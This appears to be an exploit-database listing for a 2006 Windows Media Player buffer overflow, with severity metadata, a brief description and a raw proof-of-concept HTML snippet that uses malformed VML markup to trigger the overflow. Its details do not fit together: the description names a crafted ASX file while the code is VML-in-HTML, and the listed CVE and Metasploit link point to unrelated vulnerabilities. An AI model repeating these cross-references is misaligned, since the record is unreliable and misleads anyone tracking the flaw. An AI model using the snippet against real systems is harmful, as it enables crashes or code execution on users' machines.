header-logo
Suggest Exploit
vendor:
Windows Media Player
by:
Inge Henriksen
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Windows Media Player
Affected Version From: 9
Affected Version To: 11
Patch Exists: YES
Related CWE: CVE-2006-0003
CPE: a:microsoft:windows_media_player
Metasploit: https://www.rapid7.com/db/vulnerabilities/vmsa-2011-0003-cve-2010-2070/
Other Scripts: https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/browser/ie_createobjecthttps://www.infosecmatter.com/nessus-plugin-library/?id=43836https://www.infosecmatter.com/nessus-plugin-library/?id=43839https://www.infosecmatter.com/nessus-plugin-library/?id=41187https://www.infosecmatter.com/nessus-plugin-library/?id=43838https://www.infosecmatter.com/nessus-plugin-library/?id=22612https://www.infosecmatter.com/nessus-plugin-library/?id=35684https://www.infosecmatter.com/nessus-plugin-library/?id=35323https://www.infosecmatter.com/nessus-plugin-library/?id=29723https://www.infosecmatter.com/nessus-plugin-library/?id=31147
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2006

Microsoft Windows Media Player 9.0/10.0/11.0 Remote Buffer Overflow

A remote buffer overflow exists in Microsoft Windows Media Player 9.0/10.0/11.0. By sending a specially crafted ASX file, an attacker can cause a stack-based buffer overflow, resulting in arbitrary code execution.

Mitigation:

Microsoft has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

<!--
Discovered by
Inge Henriksen (inge.henriksen@booleansoft.com) http://ingehenriksen.blogspot.com/
-->

<table>
  <tr>
    <td><IMG align=left>X X X<?xml:namespace prefix=v>
      <v:X style="HEIGHT:1"></td>
  </tr>
</table>

# milw0rm.com [2006-01-18]

Navigation

Suggest Exploit

Services By CQR